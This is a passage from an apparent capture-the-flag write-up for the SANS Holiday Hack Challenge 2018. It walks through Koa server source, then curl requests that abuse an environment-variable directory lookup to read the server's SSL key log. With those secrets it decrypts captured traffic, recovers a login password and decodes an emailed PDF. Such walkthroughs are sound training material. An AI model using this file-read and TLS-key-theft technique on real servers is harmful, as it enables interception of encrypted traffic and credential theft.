          &lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;toString&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
      &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Not Found&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
      &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;status&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;401&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
      &lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Unauthorized&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="nx"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="c1"&gt;//Route for anything in the public folder except index, home and register&lt;/span&gt;
&lt;span class="nx"&gt;router&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;env_dirs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="nx"&gt;async&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="k"&gt;try&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;Session&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;sessionizer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="c1"&gt;//Splits into an array delimited by /&lt;/span&gt;
    &lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;split_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;clean&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="c1"&gt;//Grabs directory which should be first element in array&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;dir&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;split_path&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;toUpperCase&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/span&gt;    &lt;span class="nx"&gt;split_path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;shift&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;filename&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;/&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="nx"&gt;split_path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;indexOf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;..&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;filename&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sr"&gt;/\.\./g&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;index.html&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;home.html&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;register.html&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;includes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;set&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;mime&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;lookup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;__dirname&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;dir&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/pub/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="nx"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;readFileSync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;__dirname&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;dir&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/pub/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="nx"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;status&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;404&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Not Found&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;catch&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;toString&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;

&lt;span class="nx"&gt;router&lt;/span&gt;
&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/api/:action&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;async&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="nx"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;api_function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/api/:action&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;koaBody&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="nx"&gt;multipart&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt; &lt;span class="p"&gt;}),&lt;/span&gt; &lt;span class="nx"&gt;async&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="nx"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;api_function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;

&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;server&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;http2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;createSecureServer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;options&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;app&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;callback&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
&lt;span class="nx"&gt;server&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;listen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;443&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;What can we learn from this source code:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Line 26: the application is running in dev mode&lt;/li&gt;
&lt;li&gt;Line 27: the &lt;code&gt;key_log_path&lt;/code&gt; variable holds the path to the SSL secrets
used by the server&lt;/li&gt;
&lt;li&gt;Line 27: the &lt;code&gt;process.env&lt;/code&gt; contains the path to the SSL secrets file&lt;/li&gt;
&lt;li&gt;Lines 86-88: in dev mode, every directory that is in the &lt;code&gt;process.env&lt;/code&gt;
variable is potentially accessible via the webserver.&lt;/li&gt;
&lt;li&gt;Lines 132, 140: if we access &lt;a class="reference external" href="https://packalyzer.kringlecastle.com/secret_directory/secret_file"&gt;https://packalyzer.kringlecastle.com/secret_directory/secret_file&lt;/a&gt;,
the webserver will use the value of &lt;code&gt;process.env.secret_directory&lt;/code&gt; as
the name of our folder to get the &lt;code&gt;secret_file&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This last point is interesting. Since &lt;code&gt;process.env&lt;/code&gt; contains the path to
the SSL secrets, we can try to use this automatic resolution to get the content
of &lt;code&gt;key_log_path&lt;/code&gt;. First let's try to resolve the
&lt;code&gt;process.env.SSLKEYLOGFILE&lt;/code&gt; variable:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; curl &lt;span class="s1"&gt;&amp;#39;https://packalyzer.kringlecastle.com/SSLKEYLOGFILE/&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;Error: ENOENT: no such file or directory, open &amp;#39;/opt/http2packalyzer_clientrandom_ssl.log/&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, the value of this variable seems to be
&lt;code&gt;packalyzer_clientrandom_ssl.log&lt;/code&gt;. We can now access the file. We use the
same trick as before to resolve the &lt;code&gt;process.env.DEV&lt;/code&gt; variable:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; curl &lt;span class="s1"&gt;&amp;#39;https://packalyzer.kringlecastle.com/DEV/packalyzer_clientrandom_ssl.log&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;CLIENT_RANDOM D5DFF2B39A827877C64457B9F246A2BC05869EDA679F2167692ACB36480AABB4 B6B4C39A3161566566E6291030EDEBA1F91511B8513F07CBE4A159022F497A1AEB18821887B51FDC1764F2219DEFC001&lt;/span&gt;
&lt;span class="go"&gt;CLIENT_RANDOM BBEE641A4FB1B77D8D23FE324649B02E30B024BEA322D61CC77F2A1A5A6423C7 6289BBAFD1DF5C23CCC68C6E579D71E1D18416F2D0CEB05351E10A7C27A22FEDC66221C33DFCC908490C0EBBF9BF8F97&lt;/span&gt;
&lt;span class="go"&gt;CLIENT_RANDOM 1C7E42420FBC79D157D86366DB1907CEC1D27343893647AF60D72CD4913825FE AEBC249465A01BA3A8D30E1FEB665CA0128A4F1BAC14D809F1B1F6F38F7B2423FFBC45E1402CA65E8B746174716F9B89&lt;/span&gt;
&lt;span class="go"&gt;CLIENT_RANDOM 0E21203AE0707D515D46EF381CB7E04729110B18BF8DBE8EE8C6AA2D7F1A3742 C3461766C26A9209F1F248C4C7FA9A5E588A9E7933697D7F586D3380B187A344B04EB41C9232207008E54D9E4EAF53F8&lt;/span&gt;
&lt;span class="go"&gt;CLIENT_RANDOM 2E6C446BACF3F740DA5DFB31BC922138C49B13C6DD522C770F81339D0582085A 90E48FE08378BB0E6569CB27547E8AAF724726289AE86188483A8C4D7B76A52DCA0598BBD8FF78E5F70CFDEA02208859&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Awesome, we get the SSL secrets of the webserver. We can use this to decrypt
our sniffed traffic. Here's what we'll do:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;We'll sniff 20 seconds of traffic.&lt;/li&gt;
&lt;li&gt;We'll quickly download the SSl secrets file, because it will most likely
contain the secrets for our sniffed traffic.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2018/31002530_14-1-2019_9-57-43.pcap"&gt;Here&lt;/a&gt;'s
my capture file, and &lt;a class="reference external" href="/docs/sans-christmas-challenge-2018/packalyzer_clientrandom_ssl.log"&gt;here&lt;/a&gt;'s
my SSL secrets file. Now, let's open up Wireshark, so that we can decrypt the
traffic. I found &lt;a class="reference external" href="https://lekensteyn.nl/files/wireshark-ssl-decryption.pdf#page=11"&gt;these slides&lt;/a&gt;
that explain how you can configure Wireshark to use our SSL secrets:&lt;/p&gt;
&lt;img alt="packalyzer_wireshark_http2_decrypted.png" class="align-center" src="/images/sans-christmas-challenge-2018/packalyzer_wireshark_http2_decrypted.png" /&gt;
&lt;p&gt;Awesome, we now have decrypted the HTTP/2 traffic to the website. If we look
around, we see a login request:&lt;/p&gt;
&lt;img alt="packalyzer_wireshark_password.png" class="align-center" src="/images/sans-christmas-challenge-2018/packalyzer_wireshark_password.png" /&gt;
&lt;p&gt;We found Alabaster's password to the packalyzer,
&lt;code&gt;alabaster:Packer-p&amp;#64;re-turntable192&lt;/code&gt;. Let's connect to the web site with
these credentials, and see what capture files he has accessible:&lt;/p&gt;
&lt;img alt="packalyzer_alabaster_login.png" class="align-center" src="/images/sans-christmas-challenge-2018/packalyzer_alabaster_login.png" /&gt;
&lt;p&gt;Hmmm, &lt;code&gt;super_secret_packet_capture.pcap&lt;/code&gt;, sounds interesting! You can
download it &lt;a class="reference external" href="/docs/sans-christmas-challenge-2018/super_secret_packet_capture.pcap"&gt;here&lt;/a&gt;.
Let's open it in Wireshark:&lt;/p&gt;
&lt;img alt="packalyzer_wireshark_smtp.png" class="align-center" src="/images/sans-christmas-challenge-2018/packalyzer_wireshark_smtp.png" /&gt;
&lt;p&gt;We can see some SMTP traffic. Let's follow the TCP stream to get a clearer
picture:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;220 mail.kringlecastle.com ESMTP Postfix (Ubuntu)
EHLO Mail.kringlecastle.com
250-mail.kringlecastle.com
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

MAIL FROM:&amp;lt;Holly.evergreen@mail.kringlecastle.com&amp;gt;
250 2.1.0 Ok
RCPT TO:&amp;lt;alabaster.snowball@mail.kringlecastle.com&amp;gt;
250 2.1.5 Ok
DATA
354 End data with &amp;lt;CR&amp;gt;&amp;lt;LF&amp;gt;.&amp;lt;CR&amp;gt;&amp;lt;LF&amp;gt;
Date: Fri, 28 Sep 2018 11:33:17 -0400
To: alabaster.snowball@mail.kringlecastle.com
From: Holly.evergreen@mail.kringlecastle.com
Subject: test Fri, 28 Sep 2018 11:33:17 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary=&amp;quot;----=_MIME_BOUNDARY_000_11181&amp;quot;

------=_MIME_BOUNDARY_000_11181
Content-Type: text/plain

Hey alabaster,

&lt;span class="hll"&gt;Santa said you needed help understanding musical notes for accessing the vault. He said your favorite key was D. Anyways, the following attachment should give you all the information you need about transposing music.
&lt;/span&gt;
------=_MIME_BOUNDARY_000_11181
Content-Type: application/octet-stream
Content-Transfer-Encoding: BASE64
Content-Disposition: attachment

JVBERi0xLjUKJb/3ov4KOCAwIG9iago8PCAvTGluZWFyaXplZCAxIC9MIDk3ODMxIC9IIFsgNzM4
IDE0MCBdIC9PIDEyIC9FIDc3MzQ0IC9OIDIgL1QgOTc1MTcgPj4KZW5kb2JqCiAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKOSAwIG9iago8PCAv
[snip]
2zMAAFMTA30KZW5kc3RyZWFtCmVuZG9iagogICAgICAgICAgICAgICAgICAgICAgICAgICAgIApz
dGFydHhyZWYKMjE2CiUlRU9GCg==

------=_MIME_BOUNDARY_000_11181--


.

250 2.0.0 Ok: queued as 4CF931B5C3C0
QUIT
221 2.0.0 Bye
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We get a mail from Molly Evergreen with an attached document that explains
&lt;a class="reference external" href="https://en.wikipedia.org/wiki/Transposition_(music)"&gt;music transposition&lt;/a&gt;.
Let's copy/paste the base64 encoded document and decode it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; base64 -d &amp;lt; attachment.b64 &amp;gt; attachment
&lt;span class="gp"&gt;$&lt;/span&gt; file attachment
&lt;span class="go"&gt;attachment: PDF document, version 1.5&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; mv attachment music_transposition.pdf
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We get a &lt;a class="reference external" href="/docs/sans-christmas-challenge-2018/music_transposition.pdf"&gt;PDF file&lt;/a&gt;.
Here's what it says:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;A piano keyboard gives us easy access to every (western) tone. As we go
from left to right, the pitches get higher. Pressing the middle A, for
example, would give us a tone of 440 Hertz. Pressing the next A up (to the
right) gives us 880 Hz, while the next one down (left) produces 220 Hz.
These A tones each sound very similar to us - just higher and lower. Each A
is an &amp;quot;octave&amp;quot; apart from the next. Going key by key, we count 12 &amp;quot;half
tone&amp;quot; steps between one A and the next - 12 steps in an octave.&lt;/p&gt;
&lt;p&gt;As you may have guessed, elf (and human) ears perceive pitches
logarithmically. That is, the frequency jump between octaves doubles as we
go up the keyboard, and that sounds normal to us. Consequently, the precise
frequency of each note other than A can only be cleanly expressed with a
log base 12 expression. Ugh! For our purposes though, we can think of note
separation in terms of whole and half steps.&lt;/p&gt;
&lt;p&gt;Have you noticed the black keys on the keyboard? They represent half steps
between the white keys. For example, the black key between C and D is
called C# (c-sharp) or Db (d-flat). Going from C to D is a whole step, but
either is a half step from C#/Db. Some white keys don’t have black ones
between them. B &amp;amp; C and E &amp;amp; F are each only a half step apart. Why? Well,
it turns out that our ears like it that way. Try this: press C D E F G A B
C on a piano. It sounds natural, right? The &amp;quot;C major&amp;quot; scale you just played
matches every other major scale:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;whole step from C to D&lt;/li&gt;
&lt;li&gt;whole step from D to E&lt;/li&gt;
&lt;li&gt;half step from E to F&lt;/li&gt;
&lt;li&gt;whole step from F to G&lt;/li&gt;
&lt;li&gt;Whole step from G to A&lt;/li&gt;
&lt;li&gt;Whole step from A to B, and finally&lt;/li&gt;
&lt;li&gt;Half step from B to C&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you follow that same pattern (whole whole half whole whole whole half),
you can start from any note on the keyboard and play a major scale. So a Bb
major scale would be Bb C D Eb F G A Bb. You can get this by counting whole
and half steps up from Bb or by taking each note in the C major scale and
going down a whole step.&lt;/p&gt;
&lt;p&gt;This uniform shifting of tones is called transposition. This is done all
the time in music because of differences in how instruments are designed,
the sound an arranger wants to achieve, or the comfortable vocal range of a
singer. Some elves can do this on the fly without really thinking, but it
can always be done manually, looking at a piano keyboard.&lt;/p&gt;
&lt;p&gt;To look at it another way, consider a song &amp;quot;written in the key of Bb.&amp;quot; If
the musicians don’t like that key, it can be transposed to A with a little
thought. First, how far apart are Bb and A? Looking at our piano, we see
they are a half step apart. OK, so for each note, we’ll move down one half
step. Here’s an original in Bb:&lt;/p&gt;
&lt;p&gt;D C Bb C D D D C C C D F F D C Bb C D D D D C C D C Bb&lt;/p&gt;
&lt;p&gt;And take everything down one half step for A:&lt;/p&gt;
&lt;p&gt;C# B A B C# C# C# B B B C# E E C# B A B C# C# C# C# B B C# B A&lt;/p&gt;
&lt;p&gt;We’ve just taken Mary Had a Little Lamb from Bb to A!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, the song in the document is &amp;quot;Mary Had a Little Lamb&amp;quot;!&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="ransomware-recovery"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id36"&gt;Ransomware Recovery&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="shiny-upatree-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id37"&gt;Shiny Upatree's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We must win Shiny Upatree's lottery.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;I&amp;#39;ll hear the bells on Christmas Day&lt;/span&gt;
&lt;span class="go"&gt;Their sweet, familiar sound will play&lt;/span&gt;
&lt;span class="go"&gt;  But just one elf,&lt;/span&gt;
&lt;span class="go"&gt;  Pulls off the shelf,&lt;/span&gt;
&lt;span class="go"&gt;The bells to hang on Santa&amp;#39;s sleigh!&lt;/span&gt;
&lt;span class="go"&gt;Please call me Shinny Upatree&lt;/span&gt;
&lt;span class="go"&gt;I write you now, &amp;#39;cause I would be&lt;/span&gt;
&lt;span class="go"&gt;  The one who gets -&lt;/span&gt;
&lt;span class="go"&gt;  Whom Santa lets&lt;/span&gt;
&lt;span class="go"&gt;The bells to hang on Santa&amp;#39;s sleigh!&lt;/span&gt;
&lt;span class="go"&gt;But all us elves do want the job,&lt;/span&gt;
&lt;span class="go"&gt;Conveying bells through wint&amp;#39;ry mob&lt;/span&gt;
&lt;span class="go"&gt;  To be the one&lt;/span&gt;
&lt;span class="go"&gt;  Toy making&amp;#39;s done&lt;/span&gt;
&lt;span class="go"&gt;The bells to hang on Santa&amp;#39;s sleigh!&lt;/span&gt;
&lt;span class="go"&gt;To make it fair, the Man devised&lt;/span&gt;
&lt;span class="go"&gt;A fair and simple compromise.&lt;/span&gt;
&lt;span class="go"&gt;  A random chance,&lt;/span&gt;
&lt;span class="go"&gt;  The winner dance!&lt;/span&gt;
&lt;span class="go"&gt;The bells to hang on Santa&amp;#39;s sleigh!&lt;/span&gt;
